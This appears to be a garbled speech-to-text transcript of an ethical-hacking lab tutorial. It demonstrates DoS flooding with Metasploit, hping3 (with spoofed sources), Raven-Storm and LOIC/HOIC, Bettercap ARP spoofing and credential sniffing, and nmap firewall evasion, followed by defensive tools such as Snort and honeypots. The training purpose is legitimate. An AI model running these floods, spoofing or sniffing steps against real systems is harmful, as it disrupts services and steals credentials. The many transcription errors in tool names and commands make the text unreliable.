Kali Linux. So now we would like to open the MSF console. So just type here MSF console. So now we got MSF console. Now let's see. Yes, so just type here use auxiliary DOS TCP, then you just type scan flood. So now we just type here as show options. Now we just need to set up our R hostess. So our R hostess is set. You just type here set R hostess. Enter the targeted IP address 192.168.18.26. Then so sorry, we have so I just have mistaken. So you just type back. Now you just use auxiliary scan flood. You just type clear. You just type here show options. Now just type set R hostess R host. Enter the targeted IP address 18.27 and set R port is 21. Now we just type set yes host. Enter your Linux IP address 18.26. Now you just type here exploit. Actually runtime is 0. You do not have permission to perform this capture on this device. Operation is not permitted. I just type run. So it's also a same. So we just run on sudo. Just type sudo su and enter the password. Just type here ms console. So why we have get this error? So when you look here, so but we got it some of the flooding here, but we would like to try again. So we would like to try one more time. Come back here. So we would like to use copy. So you start use auxiliary DOS TCP scan. Okay, never come. let's type clear. So just type use auxiliary. So was printing mistake here, auxiliary, and just with this DOS scan flood. So you just type set rhosters rhost. Enter the targeted IP address 192.168.18.27. Set R port is 21. Set S host. Enter your kernel Linux IP address 18.26. Again, you just type show options. That's it. So you just type run. Now it was running the flooding. Now you would like to look on the event 2. Now you can look here as how much scan flood is running here. So you can look here, bulk of scan flooding is running. So this is how you can perform of flooding the scan using Metasploit. Now we would like to go for another targeted tutorial. So I just quit this. Now go to kernel Linux. I just type here. So you just type exit. So now I would like to go for another tutorial is Hijacking flooding. So previously we have done this Hijacking flooding. So now again we would like to do here. Perform a DOS attack on target hosting using Hijacking 3. Let's type here. Perform a DOS attack on a target host using Hijacking 3. So Hijacking 3 is a command line oriented network scanning and packet crafting tool for the TCP/IP protocol that send ICMP echo requests and support TCP, UDP, ICMP, and raw IP protocols. It performs a network security, auditing, firewall testing, manual path of MTU, discovery, advanced trace route, remote OS fingerprints, and remote uptime, guessing TCP/IP stacks, auditing, and other functions. Here, we will use Hijacking 3 tool to perform a DOS attack and scan flooding, ping in deep in-depth POD attacks and UDP application layer flood attack and the targeted system. So now we would like to look. I would like to use my targeted machine is event 2. I would like to start again, continue without saving. Now it was started. So now this is my victim machine. So now you just type here as you just type clear. So now you would like to look here as come back here. So you just type hping 3 minus yes is for UDP. Set for scan the flag and targeted IP address 192.168.18.27 and a spoofable IP address is minus a is 192.168.18.20 and port is 22 and I would like to type flood. That's it. Now you just type enter. So hping is in flood mode. Now you can look here, it's in flooding now. You can see here the TCP request. It's coming a lot as you think here. So you can see here. So once you click on these statistics, so you can click on IO graph. Now in the IO graph, let it load. you can see a TCP errors, TCP analysis. The parts will be represented here. So it's still loading here. Let it load. We can see here. It's taking a bit time to load this. So you can get it like y-axis and x-axis. So when you study in mathematics, you can understand. You can get all the graph here. So how was the damage it is? So I think it was done. So you can also do some other ways for flooding the targeted IP address, otherwise port, or anything else. Choice is your wish. You can see here the graph, how it was getting as an TCP request every single second. It will give you a graph. You can look here. So I would like to close this and I just stop for this one. So now I would like to go for here. Wait. So I just was quitted. So this is how you can perform. So there is like SNMP version 2, like you can do any one of the port. Like you can specify a port like port 19, port 161, port 17, port 135, port 1900, port 389, port 69, port 37, 137, 138, 139, port 123, port 26000, VoIP is like 5060 also. You can perform choices your wish. Now, we would like to go for as an Raven string. So, you just type clear. So, you just type exit, just type clear. So, Ravenstrong is a DOS tool for penetration testing that features layer 3 or layer 4 or layer 7 attack in like TCP IP protocol, like that will come physical layer, network layer, application layer, data link layer, all those things. Okay, so it can be used to perform a strong attacks, can be optimized for non-typical targets. So you just type here sudo rst. So we have got it directly here. So I already installed the Ravenstrom from the GitHub. So now we would like to use first I would like to type here load the layer 4 module like UDP or TCP. So L4 layer 4. So here we got it here. So I want to target again my event machine. So I would like to start again as an capturing the packets. So I would like to target only again the UDP. Now I would like to come back here. So you just set up as IP. You just enter IP, enter the targeted IP address 192.168.18.27 and port is 80 and threats is like I just put for 20,000. Then you just type here as run. So do you agree to the terms of conditions? So yes. So now it was flooding now. You can look here. So the UDP protocol is flooding here from the Kali Linux IP address to the destination IP address. You can look here. It was flooding multiple ways. So you can see here address resolution, IPv4 in the VMware sender IP address. So it's coming with my Windows IP address. I would like to show you here one more thing. So you just open here as command prompt CMD. So it's taking a bit time to load this. So you can see a target port with accepting a request. So here you are getting multiple requests every single time. So I'm just stopping now. You just look here, data bytes. So I'm just stopping here also. So I just stop it. So this is how you can perform using as Raven stop. So how you would like to look. You just type here ipconfig. So this is my Windows IP address. So before you have seen there. So now we would like to go for another tutorial. This is number 3. Just type perform a DOS attack using HOIC. So you just type here perform a DDoS attack using HOIC. So what is HOIC? High Orbit Ion Cannon is a network stress and DOS and DDoS attack application. This tool, written in the basic language, it is designed to attack up to 256 target URL simultaneously. It sends a HTTP post and GET request to a computer that uses Lulu's inspired graphical user interface. It offers a high-speed, multi-threaded HTTP flood, a built-in scripting system, allows the deployment of boosters, which are scripts designed to thwart DDoS countermeasures and increase the DDoS output. So we would like to launch now. We would like to close this. So I have here DDoS. So I would like to launch this HOIC. Then click on run. It's unreadable. So it's unreadable. So we would like to look with the LOIC. Then click on run. So both low orbit ion cannon and high orbit cannon, it's also a safe. So we would like to enter the targeted IP address 192.168.18.50 okay 26. I would like to choose the UDP only. So you just put it here, the same 192.168.18.27. You just click on lock on. So write the complete address. So it shows complete address. Okay, so we just, yes, we have locked here the targeted IP address. That's better. So once this is done, now I would like to open again the event 2. Then I would like to start for sniffing again. Continue without sniffing. Saving. So now it was started as less. Now you would like to timeout for 9001 and method. You would like to, what type of method you would like to use for HTTP method, and you would like to try for either faster or speed or slow. So I would like to use for as faster. Then I would like to start now the request. Now you can see here connecting port, requesting and down. So now we can see here how much it was flooding. You can look here. So the HOIC or LOIC, low orbit, it's also a same way to perform the flooding. So this is how you can perform HOIC and LOIC performance. So in real time, a group of hackers operating hundreds or thousands of machines configure this tool on their machine and communicate with each other through IRCs like Internet Relay Chat and simulates the DOS attack by flooding a target machine or website. At the same time, the target is overwhelmed and stops for responding to the user, like you are posted, like Twitter, otherwise X platform, otherwise Facebook platform. If some persons they do a Facebook for sending a large number of requests, the Facebook will become down, including the same as WhatsApp also. WhatsApp uses like most like 5 billion users. So if you present as a DOS attack on WhatsApp, WhatsApp will be the server will be crash. So no one person can use the WhatsApp. So you can do it only upon taking a permission of the organization. So don't do all illegal things. So we just stop at this. So now we would like to look here. So we are doing all like a DOS attacks. So now we would like to uh, now protect against a DOS and DTOS attack. So how we can do that one? So we would like to look that one. So we already performed this Ravenstorm. Number 5 is detect and protect against DDoS attacks using anti-DDoS guardian. So anti-DDoS guardian is an DOS DDoS attack protection tool. It protects ISS server, Apache servers, game servers, Camfrog servers, mail servers, FTP servers, VoIP, any type of servers. It's going to protect for you. In real time, it will displace the local address and remote address and other information of each network flow. Anti-DDoS guardian limits network flow and number of client bandwidth, client current TCP connections, and number of TCP connection rates. It also limits the UDP bandwidth and UDP connections rate and UDP packet rate. So now we would like to go to our Windows machine. So now we would like to install this anti-DDoS guardian. So you just run. So you just install this. So now it was installed. Now let's see. Then click on finish. So I would like to close this. Now continue, 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 continue. So it was installed here. So now we would like to look here at the device curtain. So here you can see here, now I want to flood this targeted IP address using this. So now I would like to go to a kernel Linux. So just type here sudo su and you just type here as clear. So you just type hping3 and I would like to use the targeted IP address is 53 and I would like to flood now this one. Just enter. Now it's in flooding mode. Now I can look here. Where is this is gone already. Two higher requests. You can look here. So this is not responding. So once you get multiple requests, so it will give you the system is blocked. You cannot able to do anything else. So now you can see here, my system is blocked. Cannot able to do anything else at all. So I need to. So when you go for something, it was blocking everything. So you can look here, it was blocking. So HPing 3 DOS, it's like highly it's working. So I just power off. So for better confidence, so I just power off. So it's a powerful thing to perform. So now we would like to go for another topic is session hijacking. So I would like to use another Windows. I just open this another VMware. So what we would like to look, this is another topic. Now we would like to go for is number 10. Just type here session hijacking. So what is a session hijacking? So session hijacking is also known as TCP session hijacking. Is a security attack where an attacker takes over a valid session between user and a computer system. This allows an attacker to gain unauthorized access to the information or service provided during that session. So first, what is our first task? First task, hijack a session using jet attack proxy. So just type here, hijack a session using jet attack proxy. So JET attack proxy is an integrated penetration testing tool for finding vulnerabilities in web application. It offers automated scanners as well as set of tools that allows you to find security vulnerabilities manually. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new for penetration testing. So Jump is work similar like as the burp suit. Jump allows you to see all the requests you made to a web app and all the responses you receive from it. Among other things, it allows you to see Ajax calls that may not otherwise be outrighted visible. You can also set breakpoints which allow you to change the request and response in real time. So we would like to Go back. So open our curl Linux. So you just put it this. So you just type clear here also, and here also. So now I already installed the job proxy. So you just double tap on this. So it will open the job proxy. So now it's taking a loading for time. So let it load. So it's taking a too long lengthy time process. So we just so we would like to so let it see this one. So job proxies also can identify the vulnerability assessment also. So you can give any one of the targeted website, it will generate a reports also. So just click on no, I don't want to process recession in this type. So you just click on start. So once you make it as big, you just look here, let it load properly. So here you can look here like automated scan, otherwise manual scan. You can also get like uh, so which tools you would like to install all. So you just click on update all. So a custom, then you just type yes, and it will take for update for a time. So we just close this. So here is a quick start. So you would like to go for automated scan. So it will ask a URL to scan. So you would like to find some type of vulnerabilities. So you would like to type here test php.vulnerable.com. So you just click on attack. So it will also give a request and response also. So that you need to configure. Open the Firefox. So let the Firefox, let it open. Now, once the Firefox is open, so now you just click on these three dots, then go to a settings, So as it's taking a bit long and lengthy time process to come over here, so I'm just with a power of this one. And this one is taking much time. So you just type here. So in the network settings, you just type here network settings. So in the network settings, so you just click a manual proxy configuration. So how you can configure the purpose? You just type here. It's giving for every time 127.0.0.0.1 and port is 8080. So once you have saved this network configuration, now you just click on here as for monitoring. So once you visit any type of targeted website, you get a request and you can give a response here. That's it. So it's works similar like a pub suit. So I just don't like to, we would like to go for. So as of penetration tester, we would like to do here. So we would like to go here, test php.vulnerweb.com, then Firefox headless. So you just click on attack. So you can see here all the attack is started. So it's spidering, like it's spidering the website and it will generate a report. You can look here. What is the uh, uh, critical vulnerabilities we can find here? You can look here. Also, it will go for active scan also. And it will give what type of scans. You can look here: automation, breakpoints, ports, future, HTTP session. So you can get HTTP sessions also, uh, WebSocket and rate limit, progress. So it will take a lot of time to process all those things. So I just uh, quit it here and I just stop it here. So you would like to look here as I would like to click like file. So like look here. So no. So you just click on export, generate a report, uh, home Pentester Club test. Report would not contain alert. Generate no alert is not selected. Template, generate a report. So it's still not yet done. So as anything else is not yet done here. As so once this is done, so you can export all the generate a report and you can analyze the report here. So as it's not yet done, so I'm not going to be. So you can look here test.php vulnerable. So get index. So you can look all the vulnerabilities. So you can find here where you can get the vulnerabilities. So now we are going to use another tutorial is come back here. So we just close this. So I'm shutting down this one and this also. So our another tutorial is intercept HTTP traffic using BetterCap. So just type here intercept HTTP traffic using BetterCap. So attackers can use session hijacking to launch various kind of attacks such as man in the middle attacks. In man in the middle attack, the attacker places himself or herself between an authorized client and the web server. So that's all. Information traveling in in either direction passes through them. An ethical hacker or penetration tester, you must and should know man in the middle attack works so that you can protect your organizations and sensitive information from them. BetterCap is a powerful and flexible and portable tool created to perform various types of man-in-the-middle attacks against the network, manipulating a HTTP and HTTPS, TCP traffic and real-time, sniff the credentials and etc. So you just type here BetterCap minus help. So if you don't have BetterCap, you just install it. So you just type BetterCap, don't type minus L. So you just type BetterCap and enter, and it will ask a permission. You just type yes, and you can give your uh, Linux password. So it will install it. So I would like to string. So I would like to use iFace. So you just type here better BetterCap minus iFace is 0. So you just type sudo su and enter 0. BetterCap minus iFace is 0. So we got it here, BetterCap. So you just type help, you got it help. All these things here. So you can look here as help, list a module of available available modules. All these things. So first you just type here net.probe on and enter. So now these modules will send a different type of probe packets on each IP address on the current subnet, and you just type here. Now it was running. So now I would like to look here my main system, and another one is my VMware. This one is my Apple laptop. Another one is this is I don't know this. So this also I don't. So I would like to go for now recurrences. So now I just type here net dot record R. So I would like to make recurrences is R. So netrecon is already running. So now just type here set http dot proxy. I would like to start for SSL trip. I would like to type true. Then I would like to set ERP dot spoof dot targets. So I just enter my targeted IP address 18.27. So I would like to use my event OS. Enter your password. So I just enter here. So ERP spoof targets. So I just enter. Now I just type here http dot proxy or. So now it was started the HTTP and proxy. SSL strip is disabled. No worries. Now we just type here ARP spoof. Ah, ARP spoof is started. So now I just type here net dot sniff all. So we also started net dot sniff also on. So now also I would like to capture the password. So just type net set net dot sniff dot rich x, then you just type here as password equal to dot plus. So from my main system, I not even open any type of browser, so it's showing Swift admin. So I started password sniffing also. So now I would like to go to my event to machine. Now I would like to open a Firefox. So now let it load first. Yes. So you just type here test php.oneweb.com, then you just type enter. So in real time case scenarios, you can try targeted of any of targeted website. Your choice is your wish. So let's see. So also when you look here Kali Linux, so it was sniffing all the from iPhone 6. I know have iPhone 6, I have iPhone 13. So it was sniffing multiple information. You can look here, all entire of the targeted thing. So it's sniffing a large number of requesters. You can look here. So you go for sign up. So you just enter the username is test, password is test. Then you just click on login. So we have successfully logged in here. So you can look here, username, password, and test. You can got it here. You can look here, username test, password is test. This you can look here. We have successfully sniffing all the information here. Okay, that's it. This is how you can perform man in the middle attack. So you just quit now. So we would like to go for another tutorial. So it's even getting a spoofing of my MAC address. You can see here my MAC IP address. It's spoofing. So you can spoof any one of the targeted of the live website. So it's better. So I'm just putting now this one. So now we would like to go for another tutorial. Is come back here. Intercept HTTP traffic using Hijacking. Let's type here. Intercept HTTP traffic using HETI. So, HETI is an HTTP toolkit for security researchers. It aims to become to an open source alternative to commercial software such as Burpsuit Pro with the powerful features of tailored to, to the needs of InfoSec and bug bounty communities. HETI can be used to perform man in the middle attack, manually create and edit a request and reply a proxy request on HTTP clients and further intercept a request and response. So, if you know how HETI, so I would like to tell you how to get this HETI. So you just open here, you just type here HETI GitHub. So, you would like to get it from here. This is an HETI. So, this is a source code. So, you just need to download the main thing. Okay. So, we are going to do now this as an thing. So, in the Linux, we can do here sudo snap install HETI. So, like to go for Kali Linux. So, you just open the terminal. Just type here. Paste it. Enter. So, sudo apt get install snap. So if you know how snap, you just need to download it. So now you just type install. So you just type sudo apt get install HETI. So we cannot able to install here. So better we would like to go for here as an file new tab. So I would like to install in Ubuntu. So we would like to go here. So just type here. So you just type clear. So you just paste it this sudo snap install HETI. So you just type enter your password. Download a snap core from channel. So it was downloading. So I have Windows based. So I don't want to install as a Windows based. So it's performing a Windows based is not good every time. So I have here Windows based HETI. So let's look either it will work out, otherwise we go for Windows version. So now it was downloaded this HETI. So now we would like to look here, terminal. Okay. So you just type HETI. So now it was started in our local host. Now we would like to visit our local host. Copy this, come back. So we would like to, I would like to make this labo test. So I would like to paste this, then enter it. So we got our Haiti targeted website. You can look here. So you can change the proxy settings here also. So if you don't have anything else, so you can click on projects. So project name is you can type here anything choice is yours. Pentester Club. Create an open project. Then we would like to uh, look on this project settings. Enable a request for interception and response. Then we would like to go for click on manage projects here only. So once you go for home, proxy tabs. So without modifying, so I just go here with a using of same login credentials. So you just type here test test. So better I would like to change a proxy configuration here. So I just type here network settings. So I would like to use manual proxy configuration. You just type here 127.0.0.1 and port is 8080. So you just click on OK. Then you just go for login. So here you can see here as a filter. So you got it here as sent. As you got it here, user info. So it was loading all the informations. So request and response. So it will work same similar like burp suit. So it's well and good to perform. So to capture this, so we would like to look this. So I would like to disable now this network proxy settings. So I would like to use no manual proxy configuration, then click on OK. Now look here as so in this PHP, you got it all the information. You can look here app name, Netscape, bandwidth. So all the information. So you got it in the one is in like HTML, another one is in head. Look here. So in this source code, we can get it. So you just type here as post. The client side exception has occurred. See the console for information. So we would like to look. So it's not as error. So the application is become downtime. So you can use as an Windows based one. So if you want to perform, like if you can't able to afford for Pursuit Pro, so this is the best one. So I'm going to share this tool in the description. So now we would like to go for our final tool. Is I'm just putting this, and just open new tab and this. So minimize this. So I just want to close this terminal. So now we would like to go for another. So we would like to detect a session hijacking using Wireshark. Detect a session hijacking using Wireshark. So Wireshark allows you to capture interactively browse the traffic running on the network. The tool uses a WinCap to capture a packets, and so is only able to capture a packets on the network that are supported by WinCap. It captures a live network traffic of Ethernet or 8011 or PPP, HDLC, ATM, Bluetooth, USB, and token ring, or much more. Frame relays or FTDI networks also. Security perform. Professionals can use a Wireshark to monitor and detect the hijacking attempts. So, first, I would like to open our Wireshark again. I would like to start for sniffing, continue without saving. So now we are getting our ERP broadcast tool. So I would like to stop this one first once again. So I noted stop this HTTP proxy about 20. I would like to stop shutting down HTTP server. Okay. Now we would like to start here. So again it's broadcasting. So I was open this. Also it was broadcasting. Okay, never mind. So you just type sudo su and you just type clear. So now you just type here beta cap minus iface is 80. So you got it here. So you just type here net dot pro and net dot record and so recon is already running. So you just type net dot sniff on again. We would like to look now this now ERP package is sniffing. You can see here. So this is how you can sniff the ERP packets. So you can hijack by broadcasting by ERP. You can look here. So I just type control quit here. So it's not quitting here. So broadcasting in ARP, you can look what else you require. So now we would like to go for another tutorial. Evading IDs, firewalls, and honeypots. So now we are going to discussing about evading IDs, firewalls, and honeypots. So evading intrusion detection system, we call it as IDS also. And firewalls and honeypots is a commonly tactic used by attackers to bypass a security measures and gain unauthorized access to a system or network. So we are going to do here some practicals. So number one. So our first practical is detect intrusion using Snot. So what is an Snot? Snot is an open source network intrusion detection system capable for performing a real-time static analysis and packet logging on IP network. It can perform a protocol analysis and content searching or mapping, and it is used to detect a variety of attacks and probes such as buffer overflow or steal ports, scans, CGI attacks, SMB probes, and OS fingerprinting attempts. It uses a flexible rules and languages to describe a traffic to collect or pass as well as the detection engine that utilizes a modular plugin architecture. So first we would like to go to our event machine. So if you know how a snot, so you just type here. So while installing the snotting in Windows, it's a complex task while installing in a Windows. So better for installing in Ubuntu, it's very easy. So you just type here sudo apt get install snot. So snot already installed. The version is here. Okay. So you just type here snot minus minus help. So you got all information about the snot in here. You can see here snot. You are getting all information about the snotting. So now we would like to look here. Our task is uh, what is our IP address configuration and everything. So we would like to look here sudo gdit etc snot and snot.config. So here you can look here in the snot. You can get all the information about these things. So it's not displayed some particular data. Failed to commit a changes, failed child processors debus launch. No part DC is not. Okay. So you just type here cd etc snot list. So we just type here nano snot.config. No, it's not execute here. Vi snot.config. It also not execute. So we just type here sudo gdit etc. We just type here snot.conf. So wait. Yes. So now it was loaded. So now when you look here, so we have almost 9 modules like set the network variable, configure the decoder, configure the base detection engine, configure the dynamic loaded libraries, and configure a preprocessor, configure a output plugins, customize your rule set, customize preprocessor and decoder rule set, customize a shared object rule set. So once you look here in the number one, so you just enter the targeted IP address. Otherwise, your IP address with in your network. So when you look here, by so you just open new tab here. So it's open 2 tabs. So let's see. So you just type here cd. You just type here. So you just type here IPA. So your default gateway is not E0, EM33, and your IP address is where this is inet 192.168.27. So that I just not put 27, so I just put for 24. So that's it. So you no need to modify anything else from here. So you can search multiple things also here. So I would like to come back here. Where is this? So I would like to quit this. So now I would like to read some other things. So you just type here as clear. So you just type cd clear. So you just type here sudo, get it. So you just type etc snort rules, then just type here ftp dot rules. So you can read ftp rules also, and you can look however you can perform all the things. So you can look here. So it's look like clumsy to look all those things, but you can understand one by one once you make it is big. So all the rules is available here. So once you look here, alert DCP in the terminal, any one of the net and any type of targeted IP address that will be notified here. So anywhere else, like if you get like a fire alarm or something else, like any type of person is connected to your network, that will be notified to you. So you are no need to worry. That's it. Yeah. So now we would like to type here as, so you just type here clear. So you just type sudo snort. Sometimes it gives error. So you just type snort minus capital D minus C, and you just type etc snort etc snort snort dot config, then minus I, then so your network interface is not ETH0, ENS33. So you just need to copy this, come back here. So you just need to paste it. So you are in which type of targeted system, and what is the targeted Ethernet protocol? So in Kali Linux, so when you look here in the Kali Linux, open here. So just type here ifconfig. So this is ETH0. There is ENS33. So every system is different. So you need to mention that one. So then we would like to look here. What else we would like to put? So that's it. So it was mass XRSS of end of the rules. Now you can look here all the snorting process we are done here. So it's taking it too long. So you can look here a rule context, memory, every information you are getting. Total snort is fixed, memory cost is maximum RSS, snort successfully validated of the configuration, snort is exiting. So now I would like to sniff all the data. So what else is coming, going in my gateway? So you just type here, clear. So when you are doing in one of the target organization, you need to take a right permission to do this work. Okay, as an ethical hacker or a penetration tester, must and should take as a right and legal permission to sniff and read the data. Okay, so we would like to type here sudo. Again, you just type here snort minus a, and you just type here console minus q minus u snort minus g not minus C, etc. And you just type here. And it is not dot conf. Now we would like to type minus I and our this one copy, come back here and paste it. That's it. You just enter. So now it was capture all the information of your network. Okay. So now we would like to look here. So you would like to launch anything like here, uh, net discover. So just type sudo su. So just type here net discover minus I, it's 0. So what else the information you are doing here, so that will be displayed here. So you are, as long as you are not doing anything else from here, so it will not take any type of actions to perform it here. Okay, you can look here. This is 5327. So when you go for looking in your system, so I was provided only in the Ubuntu. That's it. So in the Ubuntu only, what else the system is going to be work? Then it's going to be reported here. That's it. So this is how it will be done. So when you change the internet protocol, this one, then it will be get in as another result also. So now we would like to visit. So this Ubuntu machine is very slow. We just type here Pentester Club. So we would like to just enter. Now we would like to look here. We not yet any type of results because I was, yes, now you can see here traffic from the SRC and destination classification, potentially bad traffic, priority with R. There is an, it came with an IP address, but it's not at present yet. And the traffic is very bad because in Ubuntu OS, you can look here, the traffic is very bad, that's why it's not going to be show as much information. So when you put for it 0, the traffic will become very good. That's it. So you can look, Firefox does not run any as much as possible. So for a better example, so I just type here sudo su and enter the password. So you just type here Wireshark minus help. Okay. Wireshark minus I as it's 0. So now a graphical user interface is running now. We would like to look here at some other information we are getting here. So once we are running in this yes or any, so we are going to run as any. So we are capturing as an ENS. So inside our system. So because I was activated this one, so any type of request that will be broadcasted here. So I just use only the targeted thing of my system only the Ubuntu to doing the snorting. That's it. So this is how you can perform the snorting. Now come back here. So you just close this also. So now we are going to do as another tutorial is back here. So our next tutorial is detect a malicious network traffic using a zone alarm free firewall. So it's right here. Detect malicious network traffic using zone alarm free firewall. So zone alarm free firewall blocks an attacker and introducer from accessing your system. It manages and monitors all incoming and outgoing traffic and shield the network from hacker or malware and other online threats that put a network privacy at risk and monitor a program and suspicious behavior and spotting and new attacks to bypass a traditional antivirus protection. This firewall prevents identify theft by guarding your data and erase your traffic, allowing you to surf the web in complete privacy. Furthermore, it logs out of attacker to block the instruction and make your PCs invisible by online. Additionally, it filters out anyone as well as potentially as a dangerous. So first, I would like to close this. It's not required anymore. So now we would like to come to our Windows machine. So I just opened a file zone alarm. So once you have installed this one, now we would like to we would like to click on the firewall tab, click on view details. So basic firewall is on and application control firewall is on. So once you click on here, so you just click on view all zones. So here is network that is running with network and another one is DHCP server. So I would like to go to any one of the targeted website. So here we would like to see here. So open new tab. Let's close this. So you just type here test.php and vulnerweb.com. So thank you for understanding. So why it's okay. So we got in this website. Okay, otherwise we would like to visit only the vulnerweb.com. So this is the best way to understand. So now I'm freely looking this one website. Like I want to block this website and access the data. So for that, I would like to come back here. So I would like to click on add host or site. So trusted and host name is uh, enter host name. I would like to enter www.vulnerweb.com. So description is I would like to block this site. So I would like to put for as blocked. So no persons can access this one from our gateway of enter of your organization. So just click on OK. So now we would like to come back here. We just look here, unable to connect. Firefox cannot establish a connection. This site could not be temporarily unavailable or too busy. Try again, furthermore movement. So it was blocking only for from our end. That's it. So when you want to look by another way, by Internet Explorer, you can look by Internet Explorer. Also, you can look by a new tab. So you just type here vulnerweb.com. So when you look this targeted website, cannot reach this page. You got it here. Make sure your address vulnerweb is correct. So you are reaching directly. The website is not available at all. Okay, like it's crashed zone. So I just close all this. So for a better thing, I would like to look here as open in. I would like to come back here. So I would like to open in the Firefox. So I just open a new tab. You just type here. So you just type here vulnerweb.com. So it was getting an open for accessing, but it was only blocking in another Windows machine. That's it. So that's it. So now we would like to click on OK, this one, and I would like to close this. So I would like to go for another tutorial. Now we would like to go for as number 3. Detect a malicious network traffic using honeypot. So just type here detect malicious network traffic using honeypot. So honeypot is a medium interaction. Honeypot for Windows. A honeypot creates a safe environment to capture and interact with unsolicited traffic on a network. Honeypot is an easy to use solution that is ideal for network security research or as part of any earlier warning IDS. So we would like to install honeypot. So I have here honeypot. Next. So I would like to create a desktop icon. Then it was installed. So once you can click on finish, then you can minimize this. So would you like to configure a honeypot now? So you just type yes. Everything in the general. It will show general. So you just click on everything. Email. So if you want to send email also you can send export and update. So once you click on general, so you just type apply. apply all. So once you apply, you just click on OK, checking for the updates. So, uh, once this is done, so now we would like to come back our Kali Linux, come back here. You just close this, open a Kali Linux terminal. So you just type here exit, just type clear. So you just type here telnet, enter the targeted IP address 18.53. Unable to connect, connection is refused. So you just type here ping 192.168.18.53. So here, once you have executed, once again, so you just put it here. I just type here clear. So I don't have activated any telnet in my Windows, otherwise anything. So first, I would like to look the targeted thing. So you just type here sudo and I would like to look nmap minus port is 21 is 53 and enter. So now I just type here FTP, enter the target IP address 18.53. So name as it coming with a Pentester Club. So you just type here administrator. Password is I would like to enter. Cannot log in into FTP is failed. So you can see here what tells my targeted IP address with the gateway. I have successfully got it. So now I would like to click on this port. I would like to look this IP address, local port of TCP, a protocol in the TCP, and bytes is 155. So once you look this targeted IP address, date, time, miles, milliseconds is 62, time zone -7, targeted IP, source of port, source of IP address, and every information I got it here. So what else he was entered to access this PC? You can look here. Public FTP services version 5.0. Username is administrator. Password request for administrator. I just enter. User administration cannot log in. So I got it the same information here. User administration cannot log in. That's it. So this is how some of the big organizations they can put honeypot. Who is going to connect our system? They get their original static IP address, including with the DHCP address. Then you are at the danger risk zone. So beware of you are doing something else. That's it. So our next task is come back here. Bypass a Windows firewall using nmap evasion technique. You just type here. Bypass Windows firewall using nmap evasion technique. So, network security administration plays a crucial role in creating a security defenses within an organization. Through a such defenses protect and machines in the network, there might be a still be an insider who may try to apply different evasion techniques to identify services running on the target. In this scenario, consider an admin has written certain Windows firewall rules to block your system from reaching one of the machines in the network. You will be taught to use Nmap in such a way that you can perform recon on the target using other active machines on the network and identify the service running on the machine along with their open ports. So first we would like to look here, go to control panel. You would like to click on system and security, Windows Defender or firewall. So your firewall is off. Now I would like to use as recommended settings. So now my firewall is active. Now I would like to, where is this? So I would like to click on advanced settings. So I would like to click on inbound rules. So I would like to add a new rule. So here, so I just click on add a new rule. So I would like to add as an custom. Where is this? There, click on next. In the program, I would like to select for all programs. Then protocol is any. Then you just put it as this one as default. Then click on next. Then any of the IP address. So in the IP address, you can click any one of the IP address. Otherwise, you just put only on this IP address. So you just click on add. So you just need to enter the targeted IP address. So you just enter 192.168.18.26. Then click on OK. So then click on next to scope. From scope to next action. So I would like to, oh sorry, I'm thinking. So I would like to, I would like to remove this. So I would like to, which remote IP address does this rule to apply? So I would like to add a remote IP address here. 192.168.18.26. Then click on OK. Then I would like to add it. So that's it. So we would like to click on next. So then I would like to block the connection for getting this any type of response. Domain private and public. Okay. Then name. So I would like to name as it is like Kali block. So that's it. So I just click on finish. So once you have finished, you just look here, Kali.block. All it was blocked. Now we would like to go to, now I would like to go to our Kali Linux machine. Now you just type here as X, you just type here as exit. exit, so you just type clear. So you just type nmap, enter the target IP address 18.53. Now you can see here, host seems is down. If it really up, but blocking your ping probe, so you just need to try with -bl, means they put not incoming to any one of the traffic here. So I would like to go for a TCP scan. So just type nmap -ess, enter the target right here. Oh, sorry. Small s and capital S. Enter the target IP address 18.53. You need to type sudo su nmap -ss. Enter now targeted IP address. Now let's see what result we gonna get it. So in the same yeah. So I got it in new terminal. Just type pick. You just type your sudo su and enter the password. So you just type here nmap -t4 -a and enter your target IP address. So let's see. So you can see a host is up, and that's the MAC address of VMware. 1000 filters is ported, but all is ignored. So you not get any useful information from here because it's blocking. Now we would like to look by here. So this will take some little bit time. And now we would like to look here again nmap -sp, enter the target IP address 18.53. So it's also the host is up. That's it. So however you can do here, so you're going to a bypassing this thing. So you can look here, all 1000 ports is scanned, not shown for 1000 filter for port scanning. Too many fingerprints match of the host to give for specific operating system. That's it. So what type of scan you can do also, it will bypass it. So you just type here as clear. Just come back here. Open this machine. So now we are going for another tutorial is by bypass a firewall rule using HTTP or FTP tunneling. So just type here bypass firewall rules using HTTP or FTP tunneling. So HTTP tunneling technologies allows an attacker to perform various internet tasks despite the restriction imposed by firewalls. This method can be implemented if the target company has a public web server with a port 80 used for HTTP traffic that is unfiltered by it firewalls. The technology encapsulates data inside HTTP traffic. Many firewalls do not examine the payload of HTTP packets to confirm that is its legitimate. Thus, it is possible to tunnel a traffic via TCP port. HTTP ports allows user to bypass the HTTP proxy, which blocks the internet access and email for instant messengers or P2P communication, otherwise file sharing, or any type of IRC servers. So here our internet software is configured so that it connects to a local PC as if it is the required remote server HTTP port, then intercept that connection and runs it via a tunnel through the proxy. HTTP port can work on devices such as proxies, otherwise firewalls, that allows for HTTP traffic. So, and HTTP port provides access of the website and internet apps, and HTTP port performs a tunneling using a one of two more SSL connect mode and a remote host. Now we would like to look this, come back here. So we are going to closing this, start here, VMware, we would like to enter our password. So before it comes, we would like to open, yeah. So open our control panel. Now we would like to go for system and security, then administrative tools. So in the services, so I would like to open these services. So let's take where it is. So we would like to run again. Otherwise, we just directly run from here as search bar. Services. So it's taking too long time to launch this. I would like to exit this. This also. So it's taking too long to launch these services. Let's see. So once you scroll down fully, now we would like to look here as in this. So here we need to look here as World Wide Web. So where it is. So here we not yet get anything of this one. So we not yet get, okay, so it was open two times. Now we would like to scroll down this one to get until the World Wide Web. So when you're running all those things in the VMware, so you know how here World Wide Web, HTTP web proxy for Discover is running. It's okay, no worries. We would like to look. So I'm just closing this. So now we would like to start directly the HTTP. So this is HTTP host, HTTP host here. So here your HTTP host. So just double tap on that. So now you can look here HTTP host. A statistic, current, total, kilobyte, and everything. So you just click on application log. Then you can click on options. So once you come to add binding listening, so you would like to listen. The password is you just keep it as anything. So we would like to keep it personal password as QWERTY. That's it. And port is 80. Then you just click on apply. Once you apply this, then we would like to look for application logs. So listening in any one of the port is 90. It's all done. So now we would like to go for, I would like to go for again to a control panel. Now just look for system and security, Windows Defender or firewall. So you just turn off. So now I don't like to go for turn off. So come back here. So you would like to click on advanced settings. So you would 